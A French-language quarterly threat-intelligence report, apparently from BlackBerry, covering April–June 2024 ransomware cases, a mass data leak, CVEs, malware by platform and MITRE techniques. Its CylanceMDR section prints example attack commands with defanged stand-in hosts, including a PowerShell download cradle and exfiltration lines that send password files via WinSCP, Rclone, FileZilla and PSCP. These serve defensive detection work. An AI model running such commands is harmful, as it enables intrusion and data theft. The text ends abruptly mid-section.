Un crime sous-estimé

Il est essentiel de s'attaquer au problème très répandu de la cybercriminalité qui n'est pas signalée si l'on veut comprendre l'ampleur et l'impact réels de ce phénomène. Un signalement précis permet non seulement aux services répressifs tels que le NC3 de réagir plus efficacement, mais aussi de renforcer les bases des contre-mesures stratégiques. En favorisant une collaboration accrue entre les secteurs public et privé, nous pouvons combler les lacunes en matière de signalement et mettre en place une défense plus solide contre la menace en constante évolution de la cybercriminalité.
Figure 3 : Évolution du classement des attaques totales stoppées et des hachages uniques, dans le présent rapport (avril - juin 2024) par rapport au rapport précédent (janvier - mars 2024).

La cyberhistoire en point de mire : Les ransomwares s'attaquent au ciel

Le ransomware Akira cible le secteur aérien de la région LATAM

En juin 2024, les chercheurs de BlackBerry ont enquêté sur une attaque menée par Storm-1567 à l'aide du ransomware Akira contre une compagnie aérienne d'Amérique latine. Ce gang aux motivations financières, connu pour ses tactiques de double extorsion, a d'abord accédé au réseau via SSH et exfiltré des données cruciales avant de déployer Akira. Connu pour exploiter des systèmes obsolètes et abuser de logiciels légitimes, Storm-1567 s'attaque aux PME dans le monde entier, ciblant plus de 250 organisations et amassant plus de 42 millions de dollars de rançon en janvier 2024.

Analyse de la réponse à l'incident et commentaires

L'équipe de réponse aux incidents (IR) de BlackBerry surveille régulièrement les incidents dans lesquels le vecteur d'infection initial est un appareil connecté à l'internet. Les cyberattaques sur les appareils vulnérables - tels que les appareils mal configurés ou ceux dont les mots de passe ont été définis en usine - sont courantes. Les équipes de sécurité des entreprises, surchargées, ne parviennent souvent pas à sécuriser de manière adéquate tous leurs dispositifs Internet (imprimantes de réseau et caméras web portables, par exemple). En outre, des fonctions de plus en plus critiques sont désormais intégrées dans les dispositifs, tels que les appareils de réseau et de pare-feu.

Ce trimestre, l'équipe IR a découvert des vulnérabilités dans des versions obsolètes de Cisco Adaptive Security Appliances (ASA) et dans des appareils équipés du logiciel PAN-OS de Palo Alto Networks. Des appareils Internet non protégés ou mal configurés peuvent permettre à des cyber-voleurs de déployer des ransomwares dans l'environnement de l'entreprise et d'exfiltrer ses données. Cela souligne la nécessité pour les entreprises d'appliquer des mises à jour de sécurité à tous les systèmes exposés à Internet et de le faire en temps opportun.(MITRE - Services externes à distance)

L'équipe a observé plusieurs incidents au cours desquels un acteur non autorisé a pu accéder aux ressources en nuage de l'entreprise. Les deux situations récentes décrites ci-dessous soulignent l'importance des mises à jour régulières des systèmes et des mesures de sécurité du réseau.

  • Incident 1 : Lors d'une atteinte à la cybersécurité, des acteurs menaçants ont exploité une série de vulnérabilités sur un Cisco ASA obsolète pour obtenir un accès non autorisé au réseau privé virtuel (VPN) de l'entreprise. Une fois dans le réseau, ils ont utilisé le protocole Microsoft Remote Desktop Protocol (RDP) pour infiltrer le contrôleur de domaine, ce qui leur a permis d'obtenir une liste complète des utilisateurs et des groupes du domaine. À l'aide d'outils tels que netscan et Advanced IP Scanner, les auteurs de la menace ont procédé à un balayage approfondi du réseau afin de cartographier l'infrastructure. Par la suite, les attaquants ont exfiltré l'intégralité du dossier "C:\Users" qui contenait des données utilisateur critiques et ont ensuite déployé le ransomware Akira, provoquant des perturbations et des pertes de données considérables.
  • Incident 2 : Un client a reçu des alertes de sécurité alarmantes de ses contrôleurs de domaine, signalant un accès non autorisé. L'enquête a révélé que les auteurs de la menace avaient exploité les vulnérabilités d'un appareil Cisco ASA obsolète et en fin de vie pour s'infiltrer dans le réseau. Une fois à l'intérieur, l'attaquant a déployé le ransomware BlackSuit, ce qui a considérablement perturbé les opérations du client.

Ces incidents soulignent la nécessité pour les entreprises de mettre en œuvre des contrôles de sécurité d'authentification forts sur tous les systèmes.(MITRE - Valid Accounts : Cloud Accounts)

Figure 11 : Principaux scénarios de réponse aux incidents, avril à juin 2024.

Faits marquants de la cyberhistoire : Une faille de données massive expose 2,9 milliards d'enregistrements

Quatre téraoctets de données hautement personnelles volées à des citoyens des États-Unis, du Royaume-Uni et du Canada.

En avril, un fil de discussion a été publié sur le célèbre site clandestin de cybercriminalité BreachForums concernant une fuite présumée de données personnelles de "l'ensemble de la population des États-Unis, de l'Australie et du Royaume-Uni". Le message affirmait que quatre téraoctets de données avaient été volés, comprenant des informations personnelles hautement sensibles telles que les noms complets, les adresses postales, les numéros de téléphone et même les numéros de sécurité sociale (SSN) de citoyens américains, ainsi que de personnes vivant au Royaume-Uni et au Canada.

L'acteur de la menace, connu sous le nom d'USDoD, a affirmé avoir volé plus de 2,9 milliards de lignes de données et a demandé une somme substantielle de 3,5 millions de dollars américains pour les informations divulguées dans ce vaste ensemble de données.

Cette demande de rançon n'a finalement pas abouti et, en juillet, 4 téraoctets de données ont été diffusés gratuitement via BreachForums. Il s'agissait de plus de 137 millions d'adresses électroniques, 272 millions de numéros de sécurité sociale, etc. La cause de la fuite serait liée à RecordsCheck.net, une filiale du courtier en données et du service de vérification des antécédents National Public Data (NPD), qui a publié par inadvertance les mots de passe de sa base de données dorsale dans un fichier en clair accessible gratuitement depuis sa page d'accueil - une omission critique en matière de sécurité qui a finalement été découverte et exploitée par l'auteur de la menace.

Dans une déclaration officielle, la NPD a reconnu qu'une tentative d'accès à ses dossiers avait eu lieu à la fin de l'année 2023 ; toutefois, elle n'a pas mentionné l'étendue des dossiers susceptibles d'avoir été touchés.

Bien que la fuite soit récente, les données s'étendent sur plusieurs décennies, ce qui signifie qu'un certain pourcentage des victimes touchées par cette fuite sont peut-être déjà décédées, et que certaines données contenues dans la fuite sont probablement obsolètes. Il est également important de noter qu'une personne peut avoir de nombreux enregistrements différents, chacun lié à des adresses et des noms antérieurs associés à cette personne. Cela signifie que le nombre de personnes touchées par cette fuite sera probablement bien inférieur à l'affirmation erronée des médias selon laquelle 3 milliards de personnes auraient été touchées.

Toutefois, compte tenu du volume de données PII, il s'agit de l'une des plus importantes fuites de données jamais enregistrées aux États-Unis, et toutes les victimes basées aux États-Unis devraient s'en inquiéter. Il est très probable que ces données volées seront exploitées et utilisées par de nombreux autres acteurs de la menace dans les mois à venir, au fur et à mesure que les retombées de cette débâcle se dissiperont. Il est donc important que tous les citoyens surveillent activement leurs rapports de crédit pour détecter toute activité frauduleuse et la signaler aux agences d'évaluation du crédit si elle est détectée.

Cyber Story en vedette : Un nouveau groupe de ransomwares - Space Bears

Dans un paysage de cybermenaces saturé de gangs de ransomwares, le ciblage d'organisations légitimes reste lucratif pour les cybercriminels. De nouveaux groupes émergent fréquemment ou se détachent d'anciens gangs, démarrant souvent leurs opérations avec une souche de ransomware nouvelle ou améliorée et un modus operandi qui suit généralement des méthodes éprouvées par d'anciens acteurs de la menace.

L'un de ces groupes, apparu au cours de la période considérée, est Space Bears, connu pour son site de fuites élégant et soigné. Certains chercheurs suggèrent qu'ils pourraient avoir des liens avec les opérateurs de Phobos RaaS.

Figure 12 : Le site de fuite des Space Bears.
Figure 12 : Le site de la fuite des Space Bears. (Source : https://socradar.io/dark-web-profile-spacebears/)

Qui sont les ours de l'espace ?

Comme la plupart des gangs de ransomware actuels, les Space Bears utilisent une double méthode d'extorsion. Après s'être introduits dans le réseau d'une victime, ils exfiltrent d'abord les données sensibles, puis les chiffrent, faisant ainsi pression sur la victime pour qu'elle paie une rançon. Les Space Bears peuvent menacer de publier les données sur Internet si la rançon n'est pas payée.

Les références aux données volées sont affichées sur leur site de fuite, situé à une adresse ".onion" sur le web profond. Le projet Tor, communément appelé "The Onion Router", est un outil de protection de la vie privée à code source ouvert qui préserve l'anonymat et la sécurité de l'activité en ligne de l'utilisateur. La victime est nommée et humiliée sur ce site de fuite, avec un compte à rebours affiché jusqu'à la libération des données, si elle ne paie pas la rançon dans le délai imparti. Depuis qu'il est devenu actif à la mi-avril, ce groupe a déjà ciblé plus de 20 victimes dans divers secteurs d'activité mondiaux.

Figure 13 : Page de la victime du site des fuites de Space Bears.
Figure 13 : Page de la victime du site des fuites de Space Bears.

Industries cibles et géolocalisations des ours de l'espace

Les victimes de Space Bears appartiennent à un large éventail d'industries disparates dans le monde entier. Le large éventail de secteurs d'activité ciblés et de lieux d'implantation dans le monde peut être intentionnel. Par exemple, le groupe peut essayer de rester sous le radar des forces de l'ordre et de compliquer la tâche des défenseurs. C'est pourquoi la coopération internationale est généralement nécessaire pour enquêter sur ces crimes et mettre fin aux activités du groupe de menace. L'activité de l'acteur de la menace étant très répandue dans le monde entier, il faut du temps aux gouvernements et aux organismes chargés de l'application de la loi pour réagir et partager des informations. Malheureusement, cela donne aux groupes de ransomware plus de possibilités de planifier, d'échapper et de se regrouper.
Figure 14 : Secteurs d'activité ciblés par le groupe de menace "Space Bears".
Figure 15 : Localisation des victimes des ours de l'espace à ce jour.

Vulnérabilités et expositions courantes

Les vulnérabilités et expositions communes notables (CVE) fournissent un cadre pour l'identification, la normalisation et la publication des vulnérabilités et expositions connues en matière de sécurité. Près de 12 011 nouvelles CVE ont été signalées par le National Institute of Standards and Technology (NIST) entre avril et juin 2024. Il s'agit d'une augmentation de près de 35 % des vulnérabilités divulguées par rapport à une période similaire allant de janvier à mars 2024.

Le mois de mai détient le record de l'année pour le nombre de nouveaux CVE découverts, avec près de 5 103 nouveaux CVE, battant ainsi tous les chiffres du premier trimestre de l'année. Il s'agit notamment de
 

Palo Alto PAN-OS RCE

CVE-2024-3400 (10.0 Critical) Exécution de code arbitraire
Selon Palo Alto, ce problème est applicable aux pare-feu PAN-OS 10.2, PAN-OS 11.0 et PAN-OS 11.1 configurés avec la passerelle GlobalProtect ou les portails GlobalProtect. Le CVE concerne l'injection de commande suite à une vulnérabilité de création de fichier arbitraire dans la fonctionnalité GlobalProtect du logiciel PAN-OS de Palo Alto Networks. Cette vulnérabilité pourrait potentiellement permettre à un attaquant non authentifié d'exécuter un code arbitraire avec les privilèges de root sur le pare-feu. Compte tenu de ce potentiel, le CVE s'est vu attribuer le score critique le plus élevé.
 

Le framework PyTorch est vulnérable au RCE

CVE-2024-5480 (10.0 Critical) Exécution de code arbitraire
Une vulnérabilité dans le framework 'torch.distributed.rpc' de PyTorch, spécifiquement dans les versions antérieures à 2.2.2, permet l'exécution de code à distance (RCE). Cette vulnérabilité permet aux attaquants d'exécuter des commandes arbitraires en utilisant des fonctions Python intégrées.

 

Divulgation d'informations sur la passerelle Quantum

CVE-2024-24919 (8.6 High) Contournement de l'authentification
Les dispositifs de réseaux périmétriques tels que les VPN sont des cibles privilégiées à la fois pour les pirates informatiques et les commanditaires étatiques avancés. Check Point™ a publié un avis zero-day le 28 mai 2024, avertissant ses clients qu'une vulnérabilité dans ses Security Gateways peut permettre aux attaquants d'accéder à des informations sensibles et d'obtenir des privilèges de domaine. Cette vulnérabilité permet aux pirates de se déplacer latéralement et d'obtenir d'autres privilèges réseau. Dans un communiqué, Check Point a indiqué qu'il y avait eu un certain nombre de tentatives d'accès non autorisé et que des milliers d'appareils potentiels étaient affectés par la faille.

Figure 16 : Score CVE, avril à juin 2024.

Menaces prévalentes par plate-forme : Windows

Voleur d'informations

Lumma Stealer est un voleur d'informations basé sur C qui se concentre sur l'exfiltration des données privées et sensibles de l'appareil de la victime, y compris les données du portefeuille de crypto-monnaies et les données de l'extension de navigateur d'authentification à deux facteurs (2FA).

Téléchargeur

GuLoader (alias CloudEyE) est un shellcode crypté enveloppé dans Visual Basic 5 ou 6 pour télécharger des charges utiles supplémentaires de différents types.

Voleur d'informations

L'agent Tesla est un cheval de Troie basé sur .NET qui est souvent vendu en tant que MaaS et qui est principalement utilisé pour la collecte d'informations d'identification.

Voleur d'informations

RisePro utilise un certain nombre de méthodes de distribution pour accéder aux appareils des victimes et collecter des données sensibles qu'il renvoie à un serveur C2.

Voleur d'informations

RedLine Stealer utilise un large éventail d'applications et de services pour collecter des informations sur les victimes, telles que les mots de passe, les cookies et les informations relatives aux cartes de crédit.

Trojan d'accès à distance

Remcos, abréviation de remote control and surveillance (contrôle et surveillance à distance), est une application utilisée pour accéder à distance à l'appareil d'une victime.

Trojan d'accès à distance

DCRat est un cheval de Troie d'accès à distance qui vole les informations de la victime et exécute des commandes à partir d'un serveur C2. DCRat a été distribué via Signal.

Botnet

Amadey est un botnet qui recueille des informations sur les victimes et attend les ordres d'un serveur C2 pour télécharger des charges utiles supplémentaires.

Menaces prévalentes par plate-forme : Linux

Cheval de Troie

Le cheval de Troie XorDDos reste très présent dans notre télémétrie au cours de cette période. Utilisant le cryptage XOR pour contrôler l'accès aux données de communication et d'exécution, XorDDos infecte les appareils basés sur Linux et les contrôle comme un botnet singulier via des instructions C2.

Porte dérobée

BPFDoor est une porte dérobée Linux qui utilise un renifleur Berkeley Packet Filter (BPF) pour intercepter et modifier le trafic réseau. BPFDoor a été utilisé comme outil de surveillance passive par le groupe d'acteurs de la menace Red Menshen en raison de sa capacité à contourner les pare-feu et à rester indétecté. Les nouvelles variantes de BPFDoor ont adopté la communication par shell inversé et un chiffrement renforcé.

Botnet

Mirai a été détecté comme utilisant une faille de contournement de l'authentification pour accéder aux terminaux, ainsi qu'une vulnérabilité d'injection de commande pour livrer et déployer le réseau de zombies et prendre le contrôle des appareils vulnérables.

Botnet

Bashlite, également connu sous le nom de Gafgyt, est un autre botnet Linux qui utilise des serveurs C2 pour envoyer des instructions à exécuter par ses appareils infectés. Il a été documenté comme ciblant des appareils de l'Internet des objets (IoT) tels que des routeurs, qu'il utilise pour coordonner des attaques DDoS à grande échelle contre des cibles.

Coinminer

XMRig reste un outil populaire pour le minage de crypto-monnaies telles que Monero en raison de ses performances élevées et de sa nature open-source. Il est souvent déployé par les acteurs de la menace une fois que l'accès initial à un système a été obtenu et utilisé pour miner de la crypto-monnaie à l'insu de la victime.

Menaces prévalentes par plate-forme : macOS

Voleur

Découvert et nommé par l'équipe de recherche sur les menaces de Kandji en avril, Cuckoo Stealer est distribué sous la forme d'un fichier image disque (DMG) malveillant qui contient des logiciels espions et des capacités de vol d'informations. Depuis sa découverte, Cuckoo Stealer a connu une forte augmentation du nombre de nouveaux échantillons du logiciel malveillant apparaissant dans la nature.

Voleur

Atomic Stealer (alias AMOS) reste très répandu et de nombreuses nouvelles variantes ont été repérées dans la nature. Les nouvelles variantes se déguisent en diverses applications distribuées par le biais d'images disques. AMOS est un voleur qui cible les mots de passe, les cookies des navigateurs, les données de remplissage automatique, les portefeuilles de crypto-monnaie et les données du trousseau de clés Mac.

Porte dérobée

Une attaque malveillante utilisant le Python Package Index (PyPI) a été découverte par des chercheurs. Le logiciel malveillant utilise la bibliothèque PyPI pour installer une charge utile Sliver C2 sur la machine cible. Le paquet est écrit dans le langage de programmation Go et utilise la stéganographie dans un fichier Portable Networks Graphic (PNG) pour mener à bien l'attaque.

Voleur

Ce logiciel malveillant se propage en utilisant des publicités Google malveillantes pour le navigateur web Arc. Ces publicités incitent la victime à télécharger un fichier d'installation DMG malveillant qui lance le processus d'infection, en déposant le logiciel malveillant sur la machine. Poseidon a la capacité de récupérer les informations d'identification des utilisateurs, les configurations VPN et les portefeuilles de crypto-monnaie.

Menaces prévalentes par plateforme : Android

Voleur d'informations

Ce voleur d'informations utilise le service d'accessibilité Android pour capturer les données de l'utilisateur et les envoyer à son serveur C2. SpyNote comprend des fonctionnalités de clic/long-clic, de capture d'écran et de verrouillage de l'écran de la victime.

Backdoor/Ransomware

Le RAT Rafel est distribué sous la forme d'un cheval de Troie ou par le biais de campagnes d'hameçonnage. Ses capacités comprennent le C2, le suivi de la localisation, la redirection des notifications de l'appareil et l'extraction des messages SMS personnels et des journaux d'appels de l'appareil cible.

Voleur d'informations

SoumniBot vole les clés bancaires et pille les comptes en banque des victimes. Le logiciel malveillant exploite un problème de validation dans le manifeste Android et vole des informations qu'il télécharge vers un serveur distant.

Voleur d'informations

Vultur a été distribué par le biais d'applications trojan et de techniques d'ingénierie sociale de type "smishing" (hameçonnage par SMS). Outre l'exfiltration de données, un acteur de la menace peut utiliser Vultur pour apporter des modifications au système de fichiers, modifier les autorisations d'exécution et contrôler l'appareil infecté à l'aide des services d'accessibilité Android.

Techniques courantes de MITRE

Comprendre les techniques de haut niveau des groupes de menace peut aider à décider des techniques de détection à privilégier. BlackBerry a observé les 20 principales techniques suivantes utilisées par les acteurs de la menace au cours de la période couverte par le rapport.
 

Techniques détectées

Le tableau suivant présente les 20 techniques les plus utilisées. Une flèche vers le haut (↑) dans la colonne "changement" indique que l'utilisation de la technique a augmenté depuis notre dernier rapport. Une flèche vers le bas (↓) indique que l'utilisation a diminué depuis notre dernier rapport. Un symbole égal (=) signifie que la technique reste dans la même position que dans notre dernier rapport.

Nom de la technique ID de la technique Nom de la tactique Dernier rapport Changer
Flux d'exécution du détournement
T1574
Persistance, escalade des privilèges, évasion des défenses
NA
Chargement latéral de DLL
T1574.002
Persistance, escalade des privilèges, évasion des défenses
3
Processus d'injection
T1055
L'escalade des privilèges, l'évasion des défenses
1
Capture d'entrée
T1056
Accès aux données d'identification, Collecte
4
=
Découverte d'informations sur le système
T1082
Découverte
2
Découverte de logiciels
T1518
Découverte
NA
Découverte de logiciels de sécurité
T1518.001
Découverte
5
Découverte du processus
T1057
Découverte
8
Découverte de fichiers et de répertoires
T1083
Découverte
7
Mascarade
T1036
Défense Evasion
6
Protocole de la couche application
T1071
Commande et contrôle
9
Protocole de la couche non applicative
T1095
Commande et contrôle
11
Découverte du système à distance
T1018
Découverte
12
Exécution du démarrage automatique au démarrage ou à l'ouverture de session
T1547
Persistance, escalade des privilèges
NA
Clés d'exécution du registre / dossier de démarrage
T1547.001
Persistance, escalade des privilèges
10
Découverte de la fenêtre d'application
T1010
Découverte
13
Dépréciation des défenses
T1562
Défense Evasion
NA
Désactiver ou modifier des outils
T1562.001
Défense Evasion
17
Tâche/travail programmé(e)
T1053
Exécution, persistance, escalade des privilèges
15
Données du système local
T1005
Collection
NA
ID de la technique
Flux d'exécution du détournement
T1574
Chargement latéral de DLL
T1574.002
Processus d'injection
T1055
Capture d'entrée
T1056
Découverte d'informations sur le système
T1082
Découverte de logiciels
T1518
Découverte de logiciels de sécurité
T1518.001
Découverte du processus
T1057
Découverte de fichiers et de répertoires
T1083
Mascarade
T1036
Protocole de la couche application
T1071
Protocole de la couche non applicative
T1095
Découverte du système à distance
T1018
Exécution du démarrage automatique au démarrage ou à l'ouverture de session
T1547
Clés d'exécution du registre / dossier de démarrage
T1547.001
Découverte de la fenêtre d'application
T1010
Dépréciation des défenses
T1562
Désactiver ou modifier des outils
T1562.001
Tâche/travail programmé(e)
T1053
Données du système local
T1005
Nom de la tactique
Flux d'exécution du détournement
Persistance, escalade des privilèges, évasion des défenses
Chargement latéral de DLL
Persistance, escalade des privilèges, évasion des défenses
Processus d'injection
L'escalade des privilèges, l'évasion des défenses
Capture d'entrée
Accès aux données d'identification, Collecte
Découverte d'informations sur le système
Découverte
Découverte de logiciels
Découverte
Découverte de logiciels de sécurité
Découverte
Découverte du processus
Découverte
Découverte de fichiers et de répertoires
Découverte
Mascarade
Défense Evasion
Protocole de la couche application
Commande et contrôle
Protocole de la couche non applicative
Commande et contrôle
Découverte du système à distance
Découverte
Exécution du démarrage automatique au démarrage ou à l'ouverture de session
Persistance, escalade des privilèges
Clés d'exécution du registre / dossier de démarrage
Persistance, escalade des privilèges
Découverte de la fenêtre d'application
Découverte
Dépréciation des défenses
Défense Evasion
Désactiver ou modifier des outils
Défense Evasion
Tâche/travail programmé(e)
Exécution, persistance, escalade des privilèges
Données du système local
Collection
Dernier rapport
Flux d'exécution du détournement
NA
Chargement latéral de DLL
3
Processus d'injection
1
Capture d'entrée
4
Découverte d'informations sur le système
2
Découverte de logiciels
NA
Découverte de logiciels de sécurité
5
Découverte du processus
8
Découverte de fichiers et de répertoires
7
Mascarade
6
Protocole de la couche application
9
Protocole de la couche non applicative
11
Découverte du système à distance
12
Exécution du démarrage automatique au démarrage ou à l'ouverture de session
NA
Clés d'exécution du registre / dossier de démarrage
10
Découverte de la fenêtre d'application
13
Dépréciation des défenses
NA
Désactiver ou modifier des outils
17
Tâche/travail programmé(e)
15
Données du système local
NA
Changer
Flux d'exécution du détournement
Chargement latéral de DLL
Processus d'injection
Capture d'entrée
=
Découverte d'informations sur le système
Découverte de logiciels
Découverte de logiciels de sécurité
Découverte du processus
Découverte de fichiers et de répertoires
Mascarade
Protocole de la couche application
Protocole de la couche non applicative
Découverte du système à distance
Exécution du démarrage automatique au démarrage ou à l'ouverture de session
Clés d'exécution du registre / dossier de démarrage
Découverte de la fenêtre d'application
Dépréciation des défenses
Désactiver ou modifier des outils
Tâche/travail programmé(e)
Données du système local

À l'aide de MITRE D3FEND™, l'équipe de recherche et de renseignement sur les menaces BlackBerry a élaboré une liste complète de contre-mesures pour les techniques observées au cours de cette période de déclaration, qui est disponible dans notre GitHub public. Les adversaires utilisent les trois techniques les plus connues pour recueillir des informations clés afin de mener des attaques réussies. Dans la section "Contre-mesures appliquées", nous présentons quelques exemples de leur utilisation et des informations utiles à surveiller. L'évaluation de l'impact de l'ensemble des techniques et tactiques est présentée dans cette figure.

Figure 17 : Techniques MITRE ATT&CK observées, d'avril à juin 2024.

Tactiques détectées

Au cours de cette période, deux tactiques présentent le même pourcentage d'observations : l'escalade des privilèges et l'évasion de la défense(23 %), suivies de la découverte (19 %). Il s'agit des mêmes tactiques que pour la période précédente.

Figure 18 : Tactiques observées de MITRE ATT&CK, avril à juin 2024.

CylanceMDR Données

Cette section du rapport met en évidence les détections de menaces les plus intéressantes observées dans les environnements des clients qui ont été ciblés par une menace au cours de la période couverte par le rapport. CylanceMDR dans les environnements des clients qui ont été ciblés par une menace au cours de cette période.

CylanceMDR est un service géré de détection et de réponse (MDR) par abonnement qui assure une surveillance 24 heures sur 24 et 7 jours sur 7. Il aide les organisations à stopper les cybermenaces sophistiquées qui cherchent à combler les lacunes des programmes de sécurité des clients. L'équipe MDR de BlackBerry a suivi des milliers d'alertes au cours de cette période. Ci-dessous, nous décomposons la télémétrie région par région afin de fournir un aperçu supplémentaire du paysage actuel des menaces.

Figure 19 : Les cinq principales alertes CylanceMDR par région.

CylanceMDR Observations

Au cours de cette période, comme dans le dernier rapport, l'équipe CylanceMDR a observé que Certutil restait une source de détection importante pour le centre des opérations de sécurité (SOC) dans toutes les régions.

Dans les régions Amérique du Nord/Amérique latine (NALA) et EMEA, nous avons également remarqué une tendance d'activité liée aux détections de " téléchargement PowerShell ". Par exemple, nous avons vu des adversaires tenter de réaliser la technique MITRE Ingress Tool Transfer (T1105) en utilisant des berceaux de téléchargement via PowerShell tels que powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1')).

En outre, nous avons observé une augmentation des détections de codes Base64, ce qui n'était pas le cas dans les conclusions de notre précédent rapport. L'encodage Base64 est un moyen relativement facile pour un acteur de la menace d'obscurcir le code, de déguiser le code malveillant et de le rendre potentiellement moins détectable. Cependant, la plupart des analystes chevronnés sont bien conscients de l'utilisation de Base64 par les acteurs de la menace, de sorte qu'une vigilance accrue et des capacités de détection sont généralement incorporées dans les SOC plus matures afin d'identifier cette technique d'évasion.

Dans les régions NALA et APAC, nous avons commencé à observer un plus grand nombre de détections liées à un "abus possible de Msiexec via le chargement de DLL" au cours de cette période de rapport. Msiexec est un utilitaire de ligne de commande dans Windows qui est généralement associé à l'exécution de paquets d'installation .msi. Notre système détecte les acteurs de la menace qui tentent d'abuser de Msiexec pour exécuter par procuration une charge utile DLL malveillante (technique MITRE T1218.007). Voici un exemple de commande : "C:\Nwindows\Nsystem32\Nmsiexec.exe /Z c:\Nprogramdata\Nevil.dll".

Activité LOLBAS

Au cours de la période couverte par le présent rapport, nous avons observé les activités suivantes concernant des binaires, des scripts et des bibliothèques "hors sol" (LOLBAS) :

  • Bitsadmin continue d'être le LOLBAS le plus observé.
  • Certutil suit de près et a augmenté depuis la dernière période de référence.
  • Regsvr32, MSHTA et MOFCOMP sont toujours observés mais représentent globalement un faible pourcentage.
Figure 20 : Activité du LOLBAS, d'avril à juin 2024.

Outils d'exfiltration

Dans notre précédent rapport, nous avons évoqué les outils de surveillance et de gestion à distance (RMM) et la manière dont ils sont souvent utilisés de manière abusive par les acteurs de la menace. Les outils RMM permettent à un attaquant de maintenir la persistance et la facilité d'accès, mais aussi d'exfiltrer facilement des données des environnements des clients. En fait, les chercheurs ont signalé que les outils RMM sont la catégorie qui connaît la croissance la plus rapide pour les groupes de ransomware afin d'exfiltrer les données des environnements des victimes.

Pour rester sur le thème de l'exfiltration, au cours de cette période, CylanceMDR a passé en revue les outils les plus courants susceptibles d'être utilisés pour l'exfiltration (à l'exclusion des outils RMM) dans les environnements de nos clients.

Figure 21 : Outils d'exfiltration détectés par CylanceMDR.

Outils

WinSCP

Description : WinSCP est un client de transfert de fichiers ; PuTTY est un client SSH (Secure Shell).

Exemple de ligne de commande : winscp.exe scp://test : P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Note : couramment utilisé avec une interface utilisateur graphique (GUI).

MITRE ATT&CK ID : T1048

Rclone

Description : Rclone est un utilitaire en ligne de commande utilisé pour gérer le contenu du stockage en nuage (c'est-à-dire pour permettre le transfert de fichiers dans le nuage).

Exemple de ligne de commande : rclone.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10

MITRE ATT&CK ID : S1040

FileZilla

Description : FileZilla est un outil de protocole de transfert de fichiers (FTP) bien connu qui peut être utilisé sur différents systèmes d'exploitation.

Exemple de ligne de commande : filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

MITRE ATT&CK ID : T1071.002

PSCP

Description : PuTTY Secure Copy Protocol (PSCP) est un utilitaire de ligne de commande utilisé pour le transfert de fichiers et de dossiers.

Exemple de ligne de commande : pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID : T1021.004

FreeFileSync

Description : FreeFileSync est un outil de synchronisation qui peut être utilisé pour gérer les sauvegardes.

Exemple de ligne de commande : FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

MITRE ATT&CK ID : T1567.002

Principaux enseignements

La liste d'outils ci-dessus n'est pas exhaustive, car il existe de nombreuses variantes d'outils utilisés à des fins d'exfiltration. Il est donc important que les organisations disposent d'une stratégie de défense contre l'utilisation d'outils susceptibles d'être utilisés à des fins malveillantes.

Ces stratégies peuvent inclure

  • Outils de prévention des pertes de données (DLP) pour détecter et prévenir la perte, l'utilisation abusive ou le partage de données sensibles à la suite d'une violation, ainsi que l'utilisation non autorisée ou l'exfiltration.
  • Chiffrement au repos et en transit.
  • Contrôles d'accès.
  • Paramètres de "moindre privilège". Ne donner accès qu'à ce qui est nécessaire.
  • Auditer régulièrement les comptes - par exemple, si un utilisateur change de rôle, il peut avoir accès à des données dont il n'a plus besoin.
  • Segmentation du réseau : en cas de violation, des segments de réseau bien définis empêcheront les mouvements latéraux et réduiront la surface d'attaque.
  • Systèmes de détection d'intrusion pour surveiller le trafic sur le réseau.
  • Appliquer l'approche "default-deny" - n'activer que ce qui est nécessaire. Par exemple :
    • Bloquer l'utilisation des ports USB ou des services de stockage en nuage. (Utilisation d'objets de stratégie de groupe (GPO) pour désactiver le transfert de données sur les ports USB).
    • Les ports ne doivent pas être exposés publiquement à l'internet (par exemple, le port 22 (SSH) ne doit pas être ouvert vers l'extérieur).
    • Réduire le risque global en limitant l'utilisation des ports, des protocoles et des services.
  • Surveillance des schémas de trafic sortant, tels que
    • Augmentation du trafic en dehors des heures normales de fonctionnement (écart par rapport à la ligne de base normale).
    • Une augmentation soudaine du trafic sortant sur le port 22 peut indiquer une exfiltration à l'aide d'un outil tel que pscp.exe.
      • Comme indiqué ci-dessus, les ports tels que le port 22 devraient appliquer une approche de refus par défaut afin de prévenir de tels risques.
  • Mise en place de contrôles pour surveiller les tentatives de sortie sur des ports ou des services qui ont été désactivés.
    • Par exemple, si un acteur menaçant accède à un réseau et tente d'activer l'utilisation de ces ports ou services, ces contrôles alerteront l'équipe de sécurité.         

Du point de vue de l'analyste SOC, voici quelques exemples de ce que les analystes doivent savoir :

Renommer un outil

Les analystes doivent connaître les outils d'exfiltration couramment utilisés ainsi que leurs options et paramètres. En utilisant l'exemple de Rclone - "rclone.exe copy " \\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10 " - un acteur de la menace peut le renommer en quelque chose de plus inoffensif comme - "svchost.exe copy "\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10".

Volume de transfert de données

En cas de transfert important de données ou d'augmentation soudaine du trafic sortant, les analystes doivent enquêter, en particulier si le transfert a lieu en dehors des heures de bureau.

Trafic anormal

Méfiez-vous d'un schéma inattendu de transferts de données à partir d'adresses IP ou d'hôtes inconnus.

Analyse du comportement des utilisateurs

Surveillez les schémas qui s'écartent de la norme, par exemple lorsqu'un utilisateur accède à des fichiers auxquels il n'a normalement pas besoin d'accéder. Par exemple, l'hôte d'un membre de l'équipe de marketing accède aux dossiers financiers des clients.

Conclusion et prévisions

Ce rapport de 90 jours, couvrant la période d'avril à juin 2024, est conçu pour vous aider à rester informé et préparé aux menaces futures. Les groupes criminels les plus en vue, en particulier les opérateurs de ransomware, exploitent de nouvelles vulnérabilités et trouvent de la valeur dans des cibles petites et grandes. Comme l'indique le rapport, les chercheurs de BlackBerry ont observé une moyenne de plus de 11 500 hashs de logiciels malveillants uniques capturés chaque jour. Compte tenu de ce niveau d'activité, il est essentiel de se tenir au courant des dernières nouvelles en matière de sécurité pour votre secteur et votre région.

Compte tenu de l'état actuel des cybermenaces, nous prévoyons les menaces suivantes pour les mois à venir :

Interférence électorale
